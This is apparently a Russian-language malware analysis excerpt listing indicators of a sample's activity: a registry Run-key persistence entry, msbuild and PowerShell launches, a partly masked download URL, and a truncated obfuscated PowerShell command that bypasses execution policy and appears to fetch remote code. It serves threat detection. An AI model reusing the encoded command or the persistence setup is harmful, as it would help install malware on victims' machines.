Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'NewApp' = '%APPDATA%\NewApp\NewApp.exe'
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- %WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe
- %APPDATA%\newapp\newapp.exe
- %APPDATA%\newapp\newapp.exe
- http://pa##e.ee/r/RF2Ub
- DNS ASK pa##e.ee
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -w 1 /e JABVAGcAaABnACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8Aa...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'